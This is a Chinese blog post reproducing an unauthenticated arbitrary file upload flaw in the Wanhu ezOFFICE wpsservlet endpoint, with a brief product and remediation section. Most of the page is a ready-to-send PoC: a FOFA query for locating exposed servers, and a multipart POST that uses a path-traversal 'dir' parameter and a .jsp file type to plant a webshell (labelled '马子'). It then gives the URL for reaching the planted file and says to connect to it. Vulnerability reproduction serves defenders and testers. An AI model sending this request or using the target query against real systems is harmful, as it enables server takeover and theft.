当前位置: 首页 > article >正文

万户ezOFFICE wpsservlet任意文件上传漏洞复现

0x01 产品简介

 万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。

0x02 漏洞概述

 万户ezOFFICE协同管理平台wpsservlet接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。

0x03 复现环境

FOFA:app="万户网络-ezOFFICE"

0x04 漏洞复现 

PoC

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=1&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=803e058d60f347f7b3c17fa95228eca6
Accept-Encoding: gzip

--803e058d60f347f7b3c17fa95228eca6
Content-Disposition: form-data; name="NewFile"; filename="1.jsp"

马子
--803e058d60f347f7b3c17fa95228eca6--

上传马子

验证url

http://your-ip/defaultroot/platform/portal/layout/1.jsp

 

尝试连接 

0x05 修复建议

关闭互联网暴露面或接口处设置访问权限

打补丁或升级安全版本


http://www.kler.cn/a/152061.html

相关文章:

  • centos7配置tomcat
  • 阅读文献总结2023
  • CTA-GAN:基于生成对抗性网络的主动脉和颈动脉非集中CT血管造影 CT到增强CT的合成技术
  • MySQL 大表设计
  • Echarts 柱状图添加标记 最大值 最小值 平均值
  • 【开题报告】基于SpringBoot的在线打印预约系统的设计与实现
  • 学习笔记:Pytorch 搭建自己的Faster-RCNN目标检测平台
  • 【双向链表的实现】
  • JS设计模式 — 行为委托
  • 基于php的求书网的设计与实现
  • 【Vulnhub 靶场】【DriftingBlues: 9 (final)】【简单】【20210509】
  • python进阶技巧
  • QtCMake工程提升类后找不到头文件
  • linux /proc 文件系统
  • WPS导出的PDF比较糊,和原始的不太一样,将带有SVG的文档输出为PDF
  • ubuntu22.04 鼠标乱动原因-关闭触屏和触摸版
  • 中国信通院发布《中国算力发展指数白皮书》(2023)
  • SAP 如何检查已安装的SAP UI5 版本
  • 数据结构(六):堆介绍及面试常考算法
  • 【Linux】基础IO--文件基础知识/文件操作/文件描述符